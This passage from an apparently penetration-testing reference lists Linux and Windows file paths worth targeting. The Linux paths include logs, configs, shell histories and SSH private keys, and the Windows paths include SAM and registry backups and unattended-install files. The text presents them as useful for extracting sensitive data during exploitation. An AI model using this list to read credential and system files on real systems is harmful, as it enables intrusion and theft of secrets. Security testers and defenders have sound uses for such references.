• /usr/local/www/logs/httpd_log
• /usr/local/Zend/etc/php.ini
• /usr/sbin/pure-config.pl
• /var/adm/log/xferlog
• /var/apache2/config.inc
• /var/apache/logs/access_log
• /var/apache/logs/error_log
• /var/cpanel/cpanel.config
• /var/lib/mysql/my.cnf
• /var/lib/mysql/mysql/user.MYD
• /var/local/www/conf/php.ini
• /var/log/apache2/access_log
• /var/log/apache2/access.log
• /var/log/apache2/error_log
• /var/log/apache2/error.log
• /var/log/apache/access_log
• /var/log/apache/access.log
• /var/log/apache/error_log
• /var/log/apache/error.log
• /var/log/apache-ssl/access.log
• /var/log/apache-ssl/error.log
• /var/log/auth.log
• /var/log/boot
• /var/htmp
• /var/log/chttp.log
• /var/log/cups/error.log
• /var/log/daemon.log
• /var/log/debug
• /var/log/dmesg
• /var/log/dpkg.log
• /var/log/exim_mainlog
• /var/log/exim/mainlog
• /var/log/exim_paniclog
• /var/log/exim.paniclog
• /var/log/exim_rejectlog
• /var/log/exim/rejectlog
• /var/log/faillog
• /var/log/ftplog
• /var/log/ftp-proxy
• /var/log/ftp-proxy/ftp-proxy.log
• /var/log/httpd/access_log
• /var/log/httpd/access.log
• /var/log/httpd/error_log
• /var/log/httpd/error.log
• /var/log/httpsd/ssl.access_log
• /var/log/httpsd/ssl_log
• /var/log/kern.log
• /var/log/lastlog
• /var/log/lighttpd/access.log
• /var/log/lighttpd/error.log
• /var/log/lighttpd/lighttpd.access.log
• /var/log/lighttpd/lighttpd.error.log
• /var/log/mail.info
• /var/log/mail.log
• /var/log/maillog
• /var/log/mail.warn
• /var/log/message
• /var/log/messages
• /var/log/mysqlderror.log
• /var/log/mysql.log
• /var/log/mysql/mysql-bin.log
• /var/log/mysql/mysql.log
• /var/log/mysql/mysql-slow.log
• /var/log/proftpd
• /var/log/pureftpd.log
• /var/log/pure-ftpd/pure-ftpd.log
• /var/log/secure
• /var/log/vsftpd.log
• /var/log/wtmp
• /var/log/xferlog
• /var/log/yum.log
• /var/mysql.log
• /var/run/utmp
• /var/spool/cron/crontabs/root
• /var/webmin/miniserv.log
• /var/www/log/access_log
• /var/www/log/error_log
• /var/www/logs/access_log
• /var/www/logs/error_log
• /var/www/logs/access.log
• /var/www/logs/error.log
• ~/.atfp_history
• ~/.bash_history
• ~/.bash_logout
• ~/.bash_profile
• ~/.bashrc
• ~/.gtkrc
• ~/.login
• ~/.logout
• ~/.mysql_history
• ~/.nano_history
• ~/.php_history
• ~/.profile
• ~/.ssh/authorized_keys
• ~/.ssh/id_dsa
• ~/.ssh/id_dsa.pub
• ~/.ssh/id_rsa
• ~/.ssh/id_rsa.pub
• ~/.ssh/identity
• ~/.ssh/identity.pub
• ~/.viminfo
• ~/.wm_style
• ~/.Xdefaults
• ~/.xinitrc
• ~/.Xresources
• ~/.xsession

Windows Interesting Files

Here you have a list of Windows Interesting files. They can be used to extract sensitive information leading to further exploitation.

It is always important to read the Administrator Guide of any application and appli the best security practices to configiguration file.

Any misconfiguration is a potential vector of attack.

• C:/Users/Administrator/NTUser.dat
• C:/Documents and Settings/Administrator/NTUser.dat
• C:/apache/logs/access.log
• C:/apache/logs/error.log
• C:/apache/php/php.ini
• C:/boot.ini
• C:/inetpub/wwwroot/global.asa
• C:/MySQL/data/hostname.err
• C:/MySQL/data/mysql.err
• C:/MySQL/data/mysql.log
• C:/MySQL/my.cnf
• C:/MySQL/my.ini
• C:/php4/php.ini
• C:/php5/php.ini
• C:/php/php.ini
• C:/Program Files/Apache Group/Apache2/conf/httpd.conf
• C:/Program Files/Apache Group/Apache/conf/httpd.conf
• C:/Program Files/Apache Group/Apache/logs/access.log
• C:/Program Files/Apache Group/Apache/logs/error.log
• C:/Program Files/FileZilla Server/FileZilla Server.xml
• C:/Program Files/MySQL/data/hostname.err
• C:/Program Files/MySQL/data/mysql-bin.log
• C:/Program Files/MySQL/data/mysql.err
• C:/Program Files/MySQL/data/mysql.log
• C:/Program Files/MySQL/my.ini
• C:/Program Files/MySQL/my.cnf
• C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
• C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
• C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
• C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
• C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
• C:/Program Files/MySQL/MySQL Server 5.0/my.ini
• C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
• C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
• C:/Program Files (x86)/Apache Group/Apache/conf/access.log
• C:/Program Files (x86)/Apache Group/Apache/conf/error.log
• C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml
• C:/Program Files (x86)/xampp/apache/conf/httpd.conf
• C:/WINDOWS/php.ini
• C:/WINDOWS/Repair/SAM
• C:/Windows/repair/system
• C:/Windows/repair/software
• C:/Windows/repair/security
• C:/WINDOWS/System32/drivers/etc/hosts
• C:/Windows/win.ini
• C:/WINNT/php.ini
• C:/WINNT/win.ini
• C:/xampp/apache/bin/php.ini
• C:/xampp/apache/logs/access.log
• C:/xampp/apache/logs/error.log
• C:/Windows/Panther/Unattend/Unattended.xml
• C:/Windows/Panther/Unattended.xml
• C:/Windows/debug/NetSetup.log
• C:/Windows/system32/config/AppEvent.Evt
• C:/Windows/system32/config/SecEvent.Evt
• C:/Windows/system32/config/default.sav
• C:/Windows/system32/config/security.sav
• C:/Windows/system32/config/software.sav
• C:/Windows/system32/config/system.sav
• C:/Windows/system32/config/regback/default
• C:/Windows/system32/config/regback/sam
• C:/Windows/system32/config/regback/security
• C:/Windows/system32/config/regback/system
• C:/Windows/system32/config/regback/software
• C:/Program Files/MySQL/MySQL Server 5.1/my.ini
• C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
• C:/Windows/System32/inetsrv/config/applicationHost.config
• C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log